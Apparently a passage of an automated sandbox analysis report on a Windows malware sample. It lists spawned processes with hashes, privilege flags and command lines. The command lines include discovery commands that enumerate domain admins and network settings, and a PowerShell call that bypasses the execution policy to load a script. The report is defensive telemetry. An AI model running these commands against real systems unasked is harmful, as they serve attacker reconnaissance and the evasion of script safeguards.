                                                                  Imagebase:0x1320000
                                                                  File size:141312 bytes
                                                                  MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: cmd.exe PID: 6804 Parent PID: 6640

                                                                  General

                                                                  Start time:11:23:06
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:cmd /c net group 'domain admins' /domain
                                                                  Imagebase:0xbd0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: net.exe PID: 6816 Parent PID: 6804

                                                                  General

                                                                  Start time:11:23:06
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:net group 'domain admins' /domain
                                                                  Imagebase:0x1b0000
                                                                  File size:46592 bytes
                                                                  MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: net1.exe PID: 6832 Parent PID: 6816

                                                                  General

                                                                  Start time:11:23:07
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\net1 group 'domain admins' /domain
                                                                  Imagebase:0x1320000
                                                                  File size:141312 bytes
                                                                  MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: powershell.exe PID: 6964 Parent PID: 6640

                                                                  General

                                                                  Start time:11:23:10
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1'
                                                                  Imagebase:0x7ff785e30000
                                                                  File size:447488 bytes
                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high
                                                                  Show Windows behavior

                                                                  File Activities

                                                                  Analysis Process: cmd.exe PID: 4276 Parent PID: 6640

                                                                  General

                                                                  Start time:11:24:47
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                  Imagebase:0x2a0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Analysis Process: ipconfig.exe PID: 4944 Parent PID: 4276

                                                                  General

                                                                  Start time:11:24:48
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:ipconfig /all
                                                                  Imagebase:0xfc0000
                                                                  File size:29184 bytes
                                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  Analysis Process: ipconfig.exe PID: 6448 Parent PID: 6640

                                                                  General

                                                                  Start time:11:24:48
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:ipconfig /all
                                                                  Imagebase:0xfc0000
                                                                  File size:29184 bytes
                                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  Analysis Process: NETSTAT.EXE PID: 4424 Parent PID: 6640

                                                                  General

                                                                  Start time:11:24:48
                                                                  Start date:05/04/2021
                                                                  Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netstat -na
                                                                  Imagebase:0x1100000
                                                                  File size:32768 bytes
                                                                  MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  Disassembly

                                                                  Code Analysis